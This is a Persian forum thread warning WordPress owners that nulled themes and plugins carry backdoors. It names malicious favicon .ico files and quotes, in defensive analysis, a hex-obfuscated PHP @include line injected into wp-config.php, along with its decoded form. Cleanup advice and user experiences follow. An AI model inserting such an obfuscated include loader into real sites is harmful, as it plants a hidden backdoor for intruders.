هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

**sazsaz** · December 11th, 2017, 23:17

هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی
قبلا چندین بار هشدار دادیم و کسی توجه نکرد
متاسفانه قالب ها و افزونه های نال ، بازاری شده برای برخی کاربران و فکر این را نمی کنند که زحمت چند ساله یک شخص را می توانند به باد دهند
عزیزان خواهش می کنم از این قالب ها استفاده نکنید اگر قصد استفاده هم دارید احتیاط کنید
هکر با استفاده از کد های مخربی که در این قالب ها و افزونه ها وجود دارد استفاده کرده و کارهای زیر را انجام می دهد .
- چند مدیریت برای خویش فعال می کنند
- با استفاده از مدیریت فایل های مخرب بسیار در هاست آپلود می کنند (از طریق ویرایشگرها )
فایل اصلی آنها با پسوند .ico بوده و دارای امضایی با نوشته می باشد.
من نام دوتا فایل را برای نمونه که از دوسایت کاربران هک شده یافتم قرار می دهم .
favicon_3a0642.ico
favicon_993c6a.ico
حالا با آن دسترسی ها همه جا را ویرایش و خراب می کنند
در فایل wp-config.php فایل ایکن و ویروس خود را با چنین کدهایی فراخوانی می کنند

کد:

 @include  "\x2fh\x6fm\x65/\x6ea\x67h\x61s\x68y\x2fp\x75b\x6ci\x63_\x68t\x6dl  \x2fw\x70-\x63o\x6et\x65n\x74/\x75p\x6co\x61d\x73/\x66a\x76i\x63o\x6e_\x399\x33c\x36a\x2ei\x63o";

که دیکد آن چنین می شود

کد:

    @include "/home/8888/public_html/wp-content/uploads/favicon_993c6a.ico";

حال با توجه به فایل با استفاده از دستوراتی که در آن فایل هست همه کار می کنند مثلا در چند جا من دیدم که ایمیل تبلیغاتی می فرستند .....

حال چطور این طور سایت ها را رفع مشکل کنیم
1- اول وارد مدیریت شده و مدیران را بررسی و کاربر اضافی با دسترسی مدیریت را پاک می کنیم
2- وارد سایت شده و اکانت های اف تی پی را بررسی می کنیم
3- وارد سایت شده و فایل کانفیگ را باز کرده و کد های کد شده در سایت unphp.net زده و مسیر فایل آیکن را مشخص می کنیم و کد را نیز از فایل کانفیگ حذف می کنیم
4- سطح فایل کانفیگ را 444 قرار می دهیم
5- جستجو کرده و فایل های مشکوک را نیز حذف می کنیم
6- بر روی پوشه مدیریت پسورد می گذاریم
7- برای پوشه های آپلود و برخی افزونه ها فایل ایندکس قرار می هیم.

برگرفته شده از انجمن وردپرس ایرانی

**mre** · December 11th, 2017, 23:27

سلام
ممنون بابت مطلب خوبتون
واقعا این یکی از معضلات امروزی حوزه وب هست و نمیدونم تا کجا میخواد توسط افراد سودجو ادامه پیدا کنه

در تکمیل مطالب بالا شاید بررسی دسترسی ها به دیتابیس از طریق cPanel و گزینه Remote MySQL هم خالی از لطف نباشه که فقط IP سرور قابلیت دسترسی داشته باشه و غیر از اون دسترسی دیگه ای وجود نداشته باشه

موفق باشید
با احترام

**sazsaz** · December 11th, 2017, 23:32

نوشته اصلی توسط mre

سلام
ممنون بابت مطلب خوبتون
واقعا این یکی از معضلات امروزی حوزه وب هست و نمیدونم تا کجا میخواد توسط افراد سودجو ادامه پیدا کنه

در تکمیل مطالب بالا شاید بررسی دسترسی ها به دیتابیس از طریق cPanel و گزینه Remote MySQL هم خالی از لطف نباشه که فقط IP سرور قابلیت دسترسی داشته باشه و غیر از اون دسترسی دیگه ای وجود نداشته باشه

موفق باشید
با احترام

دقیقا توی 10 روز گذشته با بیش از 7 سایت با این مشکل برخورد کرده ام و همه از قالب های نال استفاده می کردند

**Parti_Baz** · December 12th, 2017, 02:43

بنده با نصب یک پلاگین نال شده ووکامرس در عرض یک هفته سه بار هک شدم که ایملهای تبلیغاتی ارسال میشد موجب شد ای پی سرور اسپم بشه و ایمیل هاستینگ کلا از کار بیفته که بلاخره پلاگین رو جایگزین کردم و با نصب چند افزنه امینتی فایلهای مشکوک و مخرب رو حذف کردم خداروشکر الان دو هفته است پاک پاکم

**a1994n1373** · December 12th, 2017, 06:18

سلام دوست عزیز . مرسی از اطلاع رسانیتون . بله متاسفانه مردم ما کیفیت و اوریجینال بودن رو فدای قیمت پایین و یا رایگان بودن می کنن !!!

**Aria90** · December 12th, 2017, 09:06

درود
متاسفانه من چندین ماهه درگیر این نوع سایت ها هستم و هر کاریم میکنیم باز بر میگردن با هر ابزاریم ک تست می کنیم چیزی پیدا نمیکنه
تمام کدهای مخربش رو پاک میکنیم ولی بعد 1 روز مجدد ظاهر میشن.واقعا روی اعصابه این نوع آلودگی!!

**sazsaz** · December 12th, 2017, 10:14

نوشته اصلی توسط Aria90

درود
متاسفانه من چندین ماهه درگیر این نوع سایت ها هستم و هر کاریم میکنیم باز بر میگردن با هر ابزاریم ک تست می کنیم چیزی پیدا نمیکنه
تمام کدهای مخربش رو پاک میکنیم ولی بعد 1 روز مجدد ظاهر میشن.واقعا روی اعصابه این نوع آلودگی!!

همانطور که می بینیم همه عاصی و کلافه هستند .
من سایت یکی از کاربران را جدیدا کامل حذف و دوباره بالا آوردم
البته لازم هست بگم که بهتره پسورد مدیریت را چک کنید از طریق پسورد و کرک آن نیز دست به این اعمال می توان زد

**rahimi_m321** · December 12th, 2017, 11:12

ممنون از اطلاع رسانیتون

**iranian-portal** · December 12th, 2017, 15:27

نوشته اصلی توسط mre

واقعا این یکی از معضلات امروزی حوزه وب هست و نمیدونم تا کجا میخواد توسط افراد سودجو ادامه پیدا کنه

در واقع سوء استفاده از طراح و خالق این محصولات انجام شده، نه از کسایی که دنبال مفت هستن!

سالهاست با خواهش و تمنا، التماس به این و اون، برای فرهنگ کپی رایت و استفاده از محصولات اورجینال دارم زحمت میکشم، چیزی جز خنده و مسخره دیگران ندیدم که وقتی مفتش هست، کی میاد بخره!

اینم آخر و عاقبتش!

**codfather** · December 12th, 2017, 16:17

توی تلگرام هم شیوع پیدا کرده
قالب ها و اسکریپت های پولی رو آلوده میزارن
اغلب هم قالب های فروشگاهی وردپرس!!!!

موضوع: هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

ابزارهای موضوع

نحوه نمایش موضوع

هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

تعداد تشکر ها ازsazsaz به دلیل پست مفید

پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

تعداد تشکر ها ازmre به دلیل پست مفید

پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

تعداد تشکر ها از sazsaz به دلیل پست مفید

پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

تعداد تشکر ها ازParti_Baz به دلیل پست مفید

پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

تعداد تشکر ها ازa1994n1373 به دلیل پست مفید

پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

تعداد تشکر ها ازAria90 به دلیل پست مفید

پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

تعداد تشکر ها ازiranian-portal به دلیل پست مفید

پاسخ : هشدار 100 درصد خطرناک برای دارندگان سایت وردپرسی

اطلاعات موضوع

کاربرانی که در حال مشاهده این موضوع هستند

موضوعات مشابه

سلام دوستان بروز ترین سایت دوبله فارسی کدومه این uptvs خودش فارسی می کنه ؟

لیست کلیه ی سیستمهای مدیریت محتوای فارسی و فارسی شده

درخواست اسکریپت فارسی سایت ویکی پدیا جهت راه اندازی سایت ویکی whmcs به زبان فارسی

مجوز های ارسال و ویرایش